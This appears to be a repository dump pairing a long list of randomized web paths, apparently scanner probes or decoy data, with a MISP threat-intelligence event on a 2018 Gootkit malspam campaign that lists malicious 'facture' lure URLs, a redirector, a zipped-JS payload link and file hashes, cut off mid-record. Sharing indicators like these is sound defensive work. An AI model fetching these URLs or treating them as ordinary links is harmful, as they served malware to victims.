 40 | /2011/02/09/gosling-turnover-microwave
 41 | /2011/05/06/production-deadline-selfie
 42 | /2011/05/27/social-security-number-advertisement-voyage
 43 | /2011/09/09/wedge-racing-bone
 44 | /2011/10/30/criminal-measure-eight
 45 | /2011/11/18/dead-farmer-approve
 46 | /2011/book.php?id=step-sister
 47 | /2012/04/22/present-measure-physical-examination
 48 | /2012/12/17/fly-watchmaker-segment
 49 | /2012/12/20/multimedia-behavior-policeman
 50 | /2013/07/25/margin-grasshopper-open
 51 | /2014/03/03/phablet-accountant-flock
 52 | /2015/04/11/bumper-january-country
 53 | /2015/11/22/experience-split-skills
 54 | /20859858512568388413/software_categories.php?cat_id=burglar
 55 | /21475542/index.php?showtopic=53176
 56 | /2211302274261894397/viewtopic.php?f=32&t=69542
 57 | /222dbf2e4c5c605/380450877652477/948740717405592/viewtopic.php?f=45&t=56368
 58 | /2248901533619430771/index.php?route=product/category&path=1577_1327
 59 | /238300771216441/6tntBG769v/pages/index.php?showtopic=63817
 60 | /2499221196a35e3/26ini4SOPA/58b13ab6e1046bf/3d_exhibits1.php?helicopter=1540915689890637090
 61 | /26b5328cb99e3fd/WM6bWvKeHu/3dc03c3fdeceac7/viewtopic.php?f=54&t=9743
 62 | /2867302872598451122/showpost.php?s=157bd5c942be36bef19356ade7db9c07&p=15&postcount=10
 63 | /2FOYE34xCI/index.php?route=product/manufacturer/info&manufacturer_id=84338
 64 | /2KjCTZWjXx/vm/5ad99e49b134e8c/index.php?route=product/manufacturer/info&manufacturer_id=23682
 65 | /2OvKz2Qbg9/showthread.php?t=6238&page=26
 66 | /2afd9348810237b/365422056369585/5f61fb233b32c56/Browse_Item_Details.php?Store_Id=loss
 67 | /2bdd6db9/97555506325628357550/viewtopic.php?f=50&t=20937
 68 | /2eeb681464008b44ed7b7762233d11de/strlen.php?kayak=Sources
 69 | /3035918876591034849/50617688168070295747/J.php?paul=bcc761c20f8cfecb936ff5b946d77898
 70 | /33629078298551091232/9443584012969714973/site.php?id=measure
 71 | /34934086106891811662/ZwPwYDV5Ee/index.php?showtopic=40484
 72 | /382753921572906/_private/ready/index.php?showtopic=85638
 73 | /3833aed6ee136e7fe46259ef50400d930af36bcb047d1586293aebb3b89972a5781fceda62769867eb1e7747479918b8777d444675e20e32335ad88de1e55ff3/index.php?route=product/manufacturer/info&manufacturer_id=52742
 74 | /3ba7928db775ada6d68a1183f2210d93b781743d48cc52dc7158817e1c74ff8f1103c40cfa3528385273240b7ca7ca07/index.php?showtopic=99357
 75 | /3c069ef085b54c8/VU0V8jmsHH/cube/print.php?sid=5VicpEmp4G
 76 | /40303973422379027833/show-book.php?id=8d53d15eac187daa602780c253d957d8e65c570b431c4dc7d493967c78d65129
 77 | /41649770763582007569/265efde4d450a5b4617abc41dfd5c3f1/showthread.php?t=1213&page=8
 78 | /41ecec39669488791a837dd65f854a635c397d1a0424f8e65f900c70d1ac86c56aa228de62c51c5beb0782038f742375572ff215db12db2ee20c97be4fe31586/passwd/savecart.php?CartId=599e07d57733aa6d2f68a84e520f2a1b85464ca9
 79 | /420159247408749/504113455708588/05719f8b460b64a/submit.php?improve=Kvi9g792g6
 80 | /443d63bea97cae9852df3bafd4dcf5dcb962cf58/mail_fetch/viewtopic.php?f=39&t=56557
 81 | /452ab1874c990069551f46a9cdc3f65c16978f29eab0a29dbebd02461924d673cabeb3a061198f66/showthread.php?t=97431&page=13
 82 | /46198923243328031687/applications/blockStyle.php?last-name=6419f08706689953783a59fa4faeb75c
 83 | /4735885571131902240/logout.php?dentist=9309199765977785130
 84 | /48396170957391254103/XD25OYwON1/showpost.php?s=abf72cd40a08463fad0b3d153da66cae&p=27&postcount=7
 85 | /49b9081b5f7717606fcbc5eea5ffc54d1443b2740fcf5402/rss/corporate/newsreleases_more.php?id=dispatch
 86 | /50064438597469294743/showthread.php?t=3015&page=7
 87 | /501436461654835/53f648d89ca3262/B2axyOD6hU/gallery.php?id=knee
 88 | /507728217866857/9ecc534d/bug_report/media/pr.php?id=b38cb0526f8cd52d878009d9f27be8f4
 89 | /508e90e7da8e2f7a6860eac515a6d26216b1475327b2c73a122e8c86c4bec823/viewtopic.php?f=16&t=4773
 90 | /525958547043597/nwclient/d3d19279a094c81/productinfo.php?item=digital
 91 | /5408845705064361761/60318390298252733233/store/product.php?productid=HpeEryKVd0
 92 | /55218549160365312630/6cbbbba7/page.php?pId=plastic
 93 | /5603a350f6bc7ff/3XXADb10Fs/7419e96b85fc310/viewonline.php?development=74731315435528073350
 94 | /57e742b2bbc286a/L6Qq0o7J7q/a386ec7fcea9c2c/viewtopic.php?f=83&t=50817
 95 | /584574512164208/a3/b4a2b77968e2419/viewtopic.php?f=65&t=16629
 96 | /594085761036205f91a77b0389246ce42955d4666537b0a4eeb999a6/38635126987385119650/viewtopic.php?f=27&t=83673
 97 | /59cdf39001a623620bd7976a42dde55f190382060a264e21809fc51f/ff0a503d59ddb4d5e1fb663b6475dfe0ba08f0b84ce8692d/viewtopic.php?f=84&t=48361
 98 | /5wtYymZeVy/LKYcSFhKOi/showpost.php?s=2e3e8a3c3b6b00cd3033f8e20d174bf5&p=8&postcount=7
 99 | /60448532401240107741/spanish.php?advise=46008293663258935232
100 | /609321769648165/041780d4e95fb1d/tEXfrCuBSY/viewtopic.php?f=47&t=76460
101 | /60999698898447579026/index.php?route=information/contact
102 | /615147354246727/339824645925013/nqHgct4sEE/showthread.php?t=51299&page=20
103 | /61aec049da55f7e2e65255ea8e1218cc/viewtopic.php?f=65&t=26337
104 | /620424938308106/bckgnd/kcke8Wwe1j/viewtopic.php?f=51&t=29756
105 | /637753251721337/com_contact/ljH4zACrTC/index.php?page=course
106 | /641222267738845/thumb/6456dac5bc39ec7/comment_post.php?ice=bDaE06lCQU
107 | /65917027385445823001/4599458166864188456/index.php?showtopic=81327
108 | /69486110992431741305/category.php?c=79ac17c2
109 | /71252440967691429448/showthread.php?t=51839&page=5
110 | /72462b6120710b1/cmPB3YbWjm/0vre6yBjNa/index.php?showtopic=73593
111 | /727199161832895482/viewtopic.php?f=71&t=26334
112 | /738482134172477/5a6e4c5ad8310ae/update/index.php?route=product/category
113 | /764259134406300/eO0syHaK6A/938292783739464/index.php?showtopic=32840
114 | /7771652726274954839/catalog/main.php?cat_id=reason-for-leaving
115 | /7e908c5f441fa74/1Pd3btmGCs/boot/index.php?showtopic=34448
116 | /7fffaf82045a0ec/phputf8/3a2762876086bd2/item.php?id=competition
117 | /80139813138017023101/ftiMFwsXCd/index.php?showtopic=10563
118 | /821867171797328/67/d3/showthread.php?t=62292&page=1
119 | /8348401120973205580/6c1e55ec7c43dc51a37472ddcbd756fb/index.php?route=information/information&information_id=25270
120 | /83955431466811148818/showpost.php?s=90e28e9640702d0120b0fa38f61c4c42&p=8&postcount=9
121 | /85204952599543909318/dev/main.php?id=admit
122 | /865d46ba45c88c9b520c26020a4b8c83476a3e65eae1c48ae7a6a8fc7d8c89e16629bca935e7b4a24bac8ae1932202f210fd0552194bf54f3101489df590a00a/showpost.php?s=0ba398d67c2389e94a5acf3204716e30&p=15&postcount=1
123 | /86fb7c1b/showpost.php?s=af75b6af5d0f08cf675149da13b1d3e4&p=13&postcount=8
124 | /87391485991349521175/profile.php?bacon=81f2879e90c6c561445792fde703d954312b93ee6d51ae3b231b8b1c
125 | /8Fu4lvjTY2/fashion_mosaic/showpost.php?s=1cc7b7ff87cfcf7caea7ce309a5e5d72&p=7&postcount=3
126 | /9018964071199881542/e8895e06a71723b398802768b8d07028/index.php?route=information/contact
127 | /909768739810892/cddedf2190efb4b/nxRARjdWS0/showthread.php?t=22084&page=7
128 | /9306117437407749146/showthread.php?t=82404&page=5
129 | /94145099170678426869/zh_CN/showthread.php?t=52588&page=26
130 | /9428a371/text.php?cylinder=5a3290c53c6fa5a0ec5a28416cb6b593d02c6226cf9ff770d9a789a9d442a0b0
131 | /945787377004800/PWBoARWwqH/951552771319641/categories.php?cat=7d04bf542126a5a28cd372f2d0f0b43f
132 | /98061526464187edd082f4ba0017dda0e1b55a10/index.php?page=e7816b5490686dd9224112f856c0a5ba19606512
133 | /988479829705931/649913352460460/0hnOEs2CP4/Browse_Item_Details.php?Store_Id=W96iVxgk6d
134 | /99a0d90705d8949/easton/199339748375806/c.php?extend=SeEIsHc7u1
135 | /9bCJpFnIzG/60824605262893734666/PEAR5.php?blinker=lN5rnRJGEi
136 | /9c5c7513becf7ecd09483e82503633b2467d75e04d7294f8262636b7ab25f23d/Db/index.php?route=product/category&path=6977_8691
137 | /9ed5636ac11572e43d83cbe6a4e07157bb3e094e25df12e2d980cb10b1cf6ac8/showthread.php?t=63341&page=6
138 | /9ed5e4afeac2475b57bf4d1ce23e2cc2/v1UOs0Duy1/banners.php?elementary-school=4616403059922819336
139 | /AP7Nc7I2yr/uS5BUqHpnX/viewtopic.php?f=55&t=11206
140 | /CRYPTO/viewtopic.php?f=15&t=15947
141 | /Container/5550d10b584371cd/index.php?route=product/category&path=3031
142 | /Date/LhTHDPafR9/700574652483890/index.php/en/component/pvm/?view=delivery
143 | /DeTBuBSkBq/mod_title/37dade1e2d493bf/showpost.php?s=42aee23f32b7985d83f5115a303ccfa5&p=2&postcount=7
144 | /EbEhgzugf9/28925408949095888384/showpost.php?s=6996b1b46b985e1e04a097db394d2542&p=12&postcount=8
145 | /Function/index.php?route=product/category
146 | /H5nViO7qoz/bc/showthread.php?t=19446&page=25
147 | /JPN/fckeditor.php?high-schoolhusbands-name=Ow8PP8Rajf
148 | /JkvuJYIKwJ/v2/beginedit8.php?feedback=dc4a75b4
149 | /K8AoZkp8kC/670727624352544/57cbbd6ad2d6a4f/album.php?dipstick=siteadmin
150 | /KsL45zUOdM/productlist.php?ViewType=Category&CategoryID=245607921767948422
151 | /LB1zfM4Kyu/cart/q3OYEkgmA3/index.php?showtopic=17970
152 | /LICENSE/600657181701211/hOxyEqKXQP/show_item_details.php?item_id=certification
153 | /MSADC/9fQeO7zWAb/237879867026671/viewtopic.php?f=65&t=90291
154 | /Mxoki6IUb8/4b7f8485/bo82qMhYPP/showpost.php?s=d8bbc276e322c3e8c22886df1d4e31d5&p=12&postcount=5
155 | /QBSyDaKG02/59/570566201377568/emailToFriend.php?idProduct=charge
156 | /S8cOCeU6vc/116721490015595/fbde9a2c59d3138/viewtopic.php?f=62&t=82637
157 | /TG8ylESjJp/resources/vulnerabilities_list.php?id=floor
158 | /TfxhsXHYih/showpost.php?s=2d1ef8f39d2c1590daf9a3737c8a931d&p=14&postcount=6
159 | /UkStxZ3FRN/9303817fc58a4e2a/viewtopic.php?f=47&t=1891
160 | /VxSETWKbo5/65464409412457773748/viewtopic.php?f=91&t=29100
161 | /Win2k/34058246861346736996/showthread.php?t=99893&page=18
162 | /WjeNxhdT5v/QASU7F9xZL/fr/commande-liste-categorie.php?panier=helicopter
163 | /Y0feP6naNR/details.php?Product_ID=no_NO
164 | /a89d6d0a/2vpl5bOTXE/index.php?route=information/contact
165 | /a9bb79c7/viewtopic.php?f=29&t=60747
166 | /aPKr0Oe5GV/23861001482170285181/showpost.php?s=e74b32ba071772d5b55f97159db2e998&p=2&postcount=1
167 | /about/showpost.php?s=4a3c9b0079ce41ad7a090322fd77908f&p=19&postcount=8
168 | /ae0f01213879daba740aa7dfd11328548c0534d220253d12aa6e927498d216c8/article.php?id=209359116199123920
169 | /b5622f7fd8eddcfb/index.php?route=product/category
170 | /b5a0a287d4a6174c5f62482959fdaeac/51486628462272099935/showpost.php?s=7e00cda28df36131e359f285250948f4&p=3&postcount=8
171 | /b8e5d20357d7b1c35365da48071ee230ce977c0fb35d49da621bfc61/version/book/bookcover.php?bookid=24c424d4ddaacd4e44af08c9014b82b1bba76ba02f8ccdc4db997892
172 | /bDyl2xXs4g/6300764098966581394/index.php?showtopic=44778
173 | /backupdata/08bd8b3a0b030fd/blue/showthread.php?t=80471&page=21
174 | /bb03e43ffe34eeb242a2ee4a4f125e56/index.php?showtopic=35913
175 | /bc0d278bf81995c427c25d15e864d4622f23b4dd20da83c82ebd020b/index.php?showtopic=80363
176 | /bcac371b54f5994/160203047429834/ee5141eb01e1112/modifier.spacify.php?install=c4
177 | /bd6ecf2f23cce0df0da077da0d196c7f410a45287b59f1aeaf48404f85f2d3fa/M1YD0XsdYK/viewtopic.php?f=48&t=12834
178 | /bf/194bd2d69faf33d/7fcf206af8034e7/viewtopic.php?f=49&t=93004
179 | /blog/RjgiC0tqy7/4089a9b237b767f/index.php?route=common/home
180 | /c/dJ06UDwmPH/showthread.php?t=2372&page=12
181 | /c0e537d8fc84149c87fbd5ecfe54716ab34142fbac9da62f3e4443ffd11a08c0be70f050631e852208bf3ec6aa6a756f/logfiles/index.php?route=information/contact
182 | /c1/2003/9pxVYZ9D5f/showpost.php?s=91438c26aba5f20778fdc4996c198795&p=10&postcount=6
183 | /c6862d63b17d713/vi/ZxiLzymwAn/viewtopic.php?f=67&t=45614
184 | /c97750d7c126d2b/laurent/Message/showthread.php?t=1357&page=30
185 | /cDcgMHFm14/index.php?showtopic=72842
186 | /cat/62Ch8DyHnd/shop_details.php?prodid=jciVwoAkpx
187 | /cb199a6166da12c4f85a35842d19b9f53170458cdab114711a7eabc8a382a290/lSsgcYzBHm/index.php?route=product/category&path=5038
188 | /ccbill/bd564298e34794f/xv/y.php?point=pages
189 | /cert/showpost.php?s=63b3366f01d511d8bb4eab0b3ae50f2e&p=7&postcount=8
190 | /com_languages/viewtopic.php?f=100&t=68331
191 | /com_weblinks/article.php?id=baboon
192 | /d9c7a05c42bbe108b900fc315a68e5dc6589addfbce429fcf5541c7b9c38fa20/modules/viewtopic.php?f=77&t=41469
193 | /demos/index.php?route=product/category
194 | /dltN5vMmmv/8452647841727717931/viewtopic.php?f=41&t=34432
195 | /dopey/2078512554762291213/showpost.php?s=a269ef5c1e7623a02a651fad5f2b8905&p=8&postcount=7
196 | /dsa0TxAuYq/showthread.php?t=74266&page=25
197 | /e0/jsp/178e9c7214f9f12/viewCat_h.php?idCategory=pWXbbcI7tQ
198 | /ebd0048d/eeca8e03c3dd680/332738072580305/viewtopic.php?f=32&t=16870
199 | /ef131fb2025525a/QLGWEFwfdh/550991586389812/core.write_file.php?lawyer=9H6UhvusOi
200 | /exampleapp/index.php?route=product/manufacturer/info&manufacturer_id=76409
201 | /exclude/OVi688oODm/5ea8963f66d4cdb/index.php?route=product/category
202 | /f6427743c1266aebb3e96839b612de1d99e1109d/showpost.php?s=18127f180f794f67e7cd415702226399&p=16&postcount=2
203 | /faq/index.php?showtopic=50574
204 | /fbe616b945200a2/SlkvHxPu8g/AtZotdvacL/catalog/main.php?cat_id=54018254562192428797
205 | /fsbb/block.php?crocus=mosaic
206 | /ft/DuFm6SztT8/components/index.php?showtopic=66927
207 | /gu/Strategy/qNXL8WmQ6G/rss.php?cat=MSFT
208 | /hardware/TWw6dTntj7/showpost.php?s=7be5a906867449ff7e9068f61915e6d2&p=16&postcount=5
209 | /header/error_log/showthread.php?t=12743&page=27
210 | /hooks/index.php?showtopic=30289
211 | /htdocs/index.php?showtopic=72364
212 | /hu/category.php?id=cic
213 | /husky/UQYhzCK0Df/43bd80fb/showpost.php?s=70a5521de63b170c394b0397e7fe25a8&p=8&postcount=9
214 | /i8hlI4Z0U2/winnt351/index.php?route=product/category&path=9110
215 | /icCFtCTqkj/4261811687988709696/updatebasket.php?bookid=aTi653Frm0
216 | /idea/zones.php?structure=161452146784446250
217 | /import/pics/251247957662388/showthread.php?t=79702&page=16
218 | /include/83524113970966608320/more_details.php?id=penalty
219 | /js/archives/3f635a090e73f9b/showthread.php?t=6636&page=18
220 | /k1vVlSQkJO/k1Ggx5Ms5q/021000d3/showpost.php?s=30b720a8935fe691e6b989d2857145a6&p=12&postcount=9
221 | /lucid/index.php?showtopic=83914
222 | /mlJp8Y8QvX/38507009782561761471/book/bookcover.php?bookid=bibliography
223 | /mod_online/7d00099070b9ca7/rti/index.php?route=product/category
224 | /moddata/a9/showpost.php?s=0d2d722e1a2a625b3ceb042daf966593&p=13&postcount=1
225 | /o/4309289136332849508/viewtopic.php?f=87&t=28823
226 | /o1MfE6uqSr/showpost.php?s=3ecf70058911d495069ec09c0c8c9190&p=22&postcount=5
227 | /oMhGQhkNJM/tUmw3OYPdR/viewtopic.php?f=64&t=18817
228 | /os2/showpost.php?s=16002f7a455a94aa4e91cc34ebdb9f2d&p=7&postcount=3
229 | /pUlwUuEYu3/book.php?id=thread
230 | /phpunit/376746258923794/453546942017287/index.php?route=common/home
231 | /portlet/961993981276554/528865443565141/sample01.php?policeman=322121fc22b260e1f533cc3f20d23d46
232 | /postgres/bMcyx6ucZI/viewtopic.php?f=76&t=48642
233 | /prep/rahUhfbSFz/lTRia5sueS/productpage.phpdouble
234 | /qZia4NpZD3/72da9ff0142a4ad5563ce1335f6754598819aa712aa09636/showpost.php?s=cbe6eee3f212933a342929e3e595ee18&p=17&postcount=4
235 | /qeIzRX7kPY/showthread.php?t=38627&page=14
236 | /r7Vd7LPKuk/HAqkAoC2F2/71f1017d062b817/viewtopic.php?f=71&t=70023
237 | /rouge/LeOFfNVnAc/2009_Q3/strcspn.php?jogging=kBZVjlNb9D
238 | /shans1/ChLa94keNo/hu_HU/sitio/item.php?idcd=iPeoE8trMF
239 | /snippets/wW8dldtzSZ/index.php?route=information/information&information_id=82046
240 | /sql.php3/viewtopic.php?f=27&t=26424
241 | /squirrelspell/42115312600379273948/showpost.php?s=b13b768ca3df456b8a0423880c3b239b&p=14&postcount=4
242 | /tV9FnNwo4h/b303debe9a6305791b9cd16b1f10b91e/promotion.php?catid=h
243 | /unix/6378761938327179278/index.php?route=product/manufacturer/info&manufacturer_id=20969
244 | /uziiScFtvB/89655106302095682951/viewtopic.php?f=66&t=73917
245 | /vxCB9Tz6Wr/ZPWYmezRt4/f.php?complain=tabfocus
246 | /xnGFCkQUHW/oldfiles/viewtopic.php?f=21&t=14177
247 | /ysI2sgbJnH/425735993741754/xEE2W2JE9B/index.php?showtopic=56695
248 | 


--------------------------------------------------------------------------------
/IOCs/Gootkit_2018-03-21_misp.event.2619.5ab28984-869c-434a-9a54-0d0fc0a8a8de.json:
--------------------------------------------------------------------------------
  1 | {"response":[{
  2 |     "Event": {
  3 |         "id": "2619",
  4 |         "orgc_id": "1",
  5 |         "org_id": "1",
  6 |         "date": "2018-03-21",
  7 |         "threat_level_id": "1",
  8 |         "info": "malspam_2018-03-21_2",
  9 |         "published": true,
 10 |         "uuid": "5ab28984-869c-434a-9a54-0d0fc0a8a8de",
 11 |         "attribute_count": "32",
 12 |         "analysis": "2",
 13 |         "timestamp": "1521651969",
 14 |         "distribution": "2",
 15 |         "proposal_email_lock": false,
 16 |         "locked": false,
 17 |         "publish_timestamp": "1521651999",
 18 |         "sharing_group_id": "0",
 19 |         "disable_correlation": false,
 20 |         "event_creator_email": "kafeine@dontneedcoffee.com",
 21 |         "Org": {
 22 |             "id": "1",
 23 |             "name": "DNC",
 24 |             "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 25 |         },
 26 |         "Orgc": {
 27 |             "id": "1",
 28 |             "name": "DNC",
 29 |             "uuid": "5749cdb1-1e74-450f-8baf-3ba5c0a8a8de"
 30 |         },
 31 |         "Attribute": [
 32 |             {
 33 |                 "id": "58851",
 34 |                 "type": "attachment",
 35 |                 "category": "Payload delivery",
 36 |                 "to_ids": false,
 37 |                 "uuid": "5ab28a95-e288-4cbc-be16-649cc0a8a8de",
 38 |                 "event_id": "2619",
 39 |                 "distribution": "5",
 40 |                 "timestamp": "1521650325",
 41 |                 "comment": "Screenshot of the mail",
 42 |                 "sharing_group_id": "0",
 43 |                 "deleted": false,
 44 |                 "disable_correlation": false,
 45 |                 "object_id": "0",
 46 |                 "object_relation": null,
 47 |                 "value": "2018-03-21_15h45_42.png",
 48 |                 "ShadowAttribute": []
 49 |             },
 50 |             {
 51 |                 "id": "58852",
 52 |                 "type": "url",
 53 |                 "category": "Network activity",
 54 |                 "to_ids": true,
 55 |                 "uuid": "5ab28abe-c330-4a62-b5ef-649ec0a8a8de",
 56 |                 "event_id": "2619",
 57 |                 "distribution": "5",
 58 |                 "timestamp": "1521650366",
 59 |                 "comment": "Url to blackTDS in the mail",
 60 |                 "sharing_group_id": "0",
 61 |                 "deleted": false,
 62 |                 "disable_correlation": false,
 63 |                 "object_id": "0",
 64 |                 "object_relation": null,
 65 |                 "value": "http:\/\/alssoq.com\/facture",
 66 |                 "ShadowAttribute": []
 67 |             },
 68 |             {
 69 |                 "id": "58853",
 70 |                 "type": "url",
 71 |                 "category": "Network activity",
 72 |                 "to_ids": true,
 73 |                 "uuid": "5ab28abe-5d24-433d-91bb-649ec0a8a8de",
 74 |                 "event_id": "2619",
 75 |                 "distribution": "5",
 76 |                 "timestamp": "1521650366",
 77 |                 "comment": "Url to blackTDS in the mail",
 78 |                 "sharing_group_id": "0",
 79 |                 "deleted": false,
 80 |                 "disable_correlation": false,
 81 |                 "object_id": "0",
 82 |                 "object_relation": null,
 83 |                 "value": "http:\/\/buysolar-ups.com\/facture",
 84 |                 "ShadowAttribute": []
 85 |             },
 86 |             {
 87 |                 "id": "58854",
 88 |                 "type": "url",
 89 |                 "category": "Network activity",
 90 |                 "to_ids": true,
 91 |                 "uuid": "5ab28abe-49ac-435a-8958-649ec0a8a8de",
 92 |                 "event_id": "2619",
 93 |                 "distribution": "5",
 94 |                 "timestamp": "1521650366",
 95 |                 "comment": "Url to blackTDS in the mail",
 96 |                 "sharing_group_id": "0",
 97 |                 "deleted": false,
 98 |                 "disable_correlation": false,
 99 |                 "object_id": "0",
100 |                 "object_relation": null,
101 |                 "value": "http:\/\/franquiciasremax.com\/facture",
102 |                 "ShadowAttribute": []
103 |             },
104 |             {
105 |                 "id": "58855",
106 |                 "type": "url",
107 |                 "category": "Network activity",
108 |                 "to_ids": true,
109 |                 "uuid": "5ab28abe-e5a0-4041-9561-649ec0a8a8de",
110 |                 "event_id": "2619",
111 |                 "distribution": "5",
112 |                 "timestamp": "1521650366",
113 |                 "comment": "Url to blackTDS in the mail",
114 |                 "sharing_group_id": "0",
115 |                 "deleted": false,
116 |                 "disable_correlation": false,
117 |                 "object_id": "0",
118 |                 "object_relation": null,
119 |                 "value": "http:\/\/inkilinorecords.net\/facture",
120 |                 "ShadowAttribute": []
121 |             },
122 |             {
123 |                 "id": "58856",
124 |                 "type": "url",
125 |                 "category": "Network activity",
126 |                 "to_ids": true,
127 |                 "uuid": "5ab28abe-18c0-4e1a-b2e3-649ec0a8a8de",
128 |                 "event_id": "2619",
129 |                 "distribution": "5",
130 |                 "timestamp": "1521650366",
131 |                 "comment": "Url to blackTDS in the mail",
132 |                 "sharing_group_id": "0",
133 |                 "deleted": false,
134 |                 "disable_correlation": false,
135 |                 "object_id": "0",
136 |                 "object_relation": null,
137 |                 "value": "http:\/\/intervacpvtltd.com\/facture",
138 |                 "ShadowAttribute": []
139 |             },
140 |             {
141 |                 "id": "58857",
142 |                 "type": "url",
143 |                 "category": "Network activity",
144 |                 "to_ids": true,
145 |                 "uuid": "5ab28abe-d6b0-40b4-bd49-649ec0a8a8de",
146 |                 "event_id": "2619",
147 |                 "distribution": "5",
148 |                 "timestamp": "1521650366",
149 |                 "comment": "Url to blackTDS in the mail",
150 |                 "sharing_group_id": "0",
151 |                 "deleted": false,
152 |                 "disable_correlation": false,
153 |                 "object_id": "0",
154 |                 "object_relation": null,
155 |                 "value": "http:\/\/jabancheapflights.com\/facture",
156 |                 "ShadowAttribute": []
157 |             },
158 |             {
159 |                 "id": "58858",
160 |                 "type": "url",
161 |                 "category": "Network activity",
162 |                 "to_ids": true,
163 |                 "uuid": "5ab28abe-4b0c-43ec-9cc6-649ec0a8a8de",
164 |                 "event_id": "2619",
165 |                 "distribution": "5",
166 |                 "timestamp": "1521650366",
167 |                 "comment": "Url to blackTDS in the mail",
168 |                 "sharing_group_id": "0",
169 |                 "deleted": false,
170 |                 "disable_correlation": false,
171 |                 "object_id": "0",
172 |                 "object_relation": null,
173 |                 "value": "http:\/\/mandmaxconstructions.com\/facture",
174 |                 "ShadowAttribute": []
175 |             },
176 |             {
177 |                 "id": "58859",
178 |                 "type": "url",
179 |                 "category": "Network activity",
180 |                 "to_ids": true,
181 |                 "uuid": "5ab28abe-2bc0-4f6d-a1e9-649ec0a8a8de",
182 |                 "event_id": "2619",
183 |                 "distribution": "5",
184 |                 "timestamp": "1521650366",
185 |                 "comment": "Url to blackTDS in the mail",
186 |                 "sharing_group_id": "0",
187 |                 "deleted": false,
188 |                 "disable_correlation": false,
189 |                 "object_id": "0",
190 |                 "object_relation": null,
191 |                 "value": "http:\/\/reconnectedhealthservices.com\/facture",
192 |                 "ShadowAttribute": []
193 |             },
194 |             {
195 |                 "id": "58860",
196 |                 "type": "url",
197 |                 "category": "Network activity",
198 |                 "to_ids": true,
199 |                 "uuid": "5ab28abe-5144-44f3-b838-649ec0a8a8de",
200 |                 "event_id": "2619",
201 |                 "distribution": "5",
202 |                 "timestamp": "1521650366",
203 |                 "comment": "Url to blackTDS in the mail",
204 |                 "sharing_group_id": "0",
205 |                 "deleted": false,
206 |                 "disable_correlation": false,
207 |                 "object_id": "0",
208 |                 "object_relation": null,
209 |                 "value": "http:\/\/txnaturalhealthdoctor.com\/facture",
210 |                 "ShadowAttribute": []
211 |             },
212 |             {
213 |                 "id": "58861",
214 |                 "type": "url",
215 |                 "category": "Network activity",
216 |                 "to_ids": true,
217 |                 "uuid": "5ab28abe-53b4-4b11-87f3-649ec0a8a8de",
218 |                 "event_id": "2619",
219 |                 "distribution": "5",
220 |                 "timestamp": "1521650366",
221 |                 "comment": "Url to blackTDS in the mail",
222 |                 "sharing_group_id": "0",
223 |                 "deleted": false,
224 |                 "disable_correlation": false,
225 |                 "object_id": "0",
226 |                 "object_relation": null,
227 |                 "value": "http:\/\/varchausky.com.ar\/facture",
228 |                 "ShadowAttribute": []
229 |             },
230 |             {
231 |                 "id": "58862",
232 |                 "type": "url",
233 |                 "category": "Network activity",
234 |                 "to_ids": true,
235 |                 "uuid": "5ab28abe-be5c-47ae-8f88-649ec0a8a8de",
236 |                 "event_id": "2619",
237 |                 "distribution": "5",
238 |                 "timestamp": "1521650366",
239 |                 "comment": "Url to blackTDS in the mail",
240 |                 "sharing_group_id": "0",
241 |                 "deleted": false,
242 |                 "disable_correlation": false,
243 |                 "object_id": "0",
244 |                 "object_relation": null,
245 |                 "value": "http:\/\/xplorerblu.com\/facture",
246 |                 "ShadowAttribute": []
247 |             },
248 |             {
249 |                 "id": "58863",
250 |                 "type": "url",
251 |                 "category": "Network activity",
252 |                 "to_ids": true,
253 |                 "uuid": "5ab28add-0a10-490b-884a-5e8ac0a8a8de",
254 |                 "event_id": "2619",
255 |                 "distribution": "5",
256 |                 "timestamp": "1521650397",
257 |                 "comment": "BlackTDS redirector to Zipped-JS",
258 |                 "sharing_group_id": "0",
259 |                 "deleted": false,
260 |                 "disable_correlation": false,
261 |                 "object_id": "0",
262 |                 "object_relation": null,
263 |                 "value": "https:\/\/ownvictory.cf\/",
264 |                 "ShadowAttribute": []
265 |             },
266 |             {
267 |                 "id": "58864",
268 |                 "type": "url",
269 |                 "category": "Network activity",
270 |                 "to_ids": true,
271 |                 "uuid": "5ab28aff-dd94-4ea2-b7fc-649cc0a8a8de",
272 |                 "event_id": "2619",
273 |                 "distribution": "5",
274 |                 "timestamp": "1521650431",
275 |                 "comment": "Link to Zipped JS",
276 |                 "sharing_group_id": "0",
277 |                 "deleted": false,
278 |                 "disable_correlation": false,
279 |                 "object_id": "0",
280 |                 "object_relation": null,
281 |                 "value": "http:\/\/vinhomesland.org\/data\/Facture_FR-4016.zip",
282 |                 "ShadowAttribute": []
283 |             },
284 |             {
285 |                 "id": "58865",
286 |                 "type": "md5",
287 |                 "category": "Payload delivery",
288 |                 "to_ids": true,
289 |                 "uuid": "5ab28b0b-f714-4e26-afce-649ec0a8a8de",
290 |                 "event_id": "2619",
291 |                 "distribution": "5",
292 |                 "timestamp": "1521650443",
293 |                 "comment": "Facture_FR-4016.zip",
294 |                 "sharing_group_id": "0",
295 |                 "deleted": false,
296 |                 "disable_correlation": false,
297 |                 "object_id": "0",
298 |                 "object_relation": null,
299 |                 "value": "da5ecf4a10b96b8e2ee87ccf26aee925",
300 |                 "ShadowAttribute": []
301 |             },
302 |             {
303 |                 "id": "58866",
304 |                 "type": "sha1",
305 |                 "category": "Payload delivery",
306 |                 "to_ids": true,
307 |                 "uuid": "5ab28b0b-5230-458a-aa75-649ec0a8a8de",
308 |                 "event_id": "2619",
309 |                 "distribution": "5",
310 |                 "timestamp": "1521650443",
311 |                 "comment": "Facture_FR-4016.zip",
312 |                 "sharing_group_id": "0",
313 |                 "deleted": false,
314 |                 "disable_correlation": false,
315 |                 "object_id": "0",
316 |                 "object_relation": null,
317 |                 "value": "8027983e840f34fd8d928863de1aae30e72e7abe",
318 |                 "ShadowAttribute": []
319 |             },
320 |             {
321 |                 "id": "58867",
322 |                 "type": "sha256",
323 |                 "category": "Payload delivery",
324 |                 "to_ids": true,
325 |                 "uuid": "5ab28b0b-201c-409e-ba0f-649ec0a8a8de",
326 |                 "event_id": "2619",
327 |                 "distribution": "5",
328 |                 "timestamp": "1521650443",
329 |                 "comment": "Facture_FR-4016.zip",
330 |                 "sharing_group_id": "0",
331 |                 "deleted": false,
332 |                 "disable_correlation": false,
333 |                 "object_id": "0",
334 |                 "object_relation": null,
335 |                 "value": "45f9ad8d6154c0692eb3f4c0c67a1d60816016601349b1d2b08d9a67e0c1befc",
336 |                 "ShadowAttribute": []
337 |             },
338 |             {
339 |                 "id": "58868",
340 |                 "type": "url",
341 |                 "category": "Network activity",
342 |                 "to_ids": true,
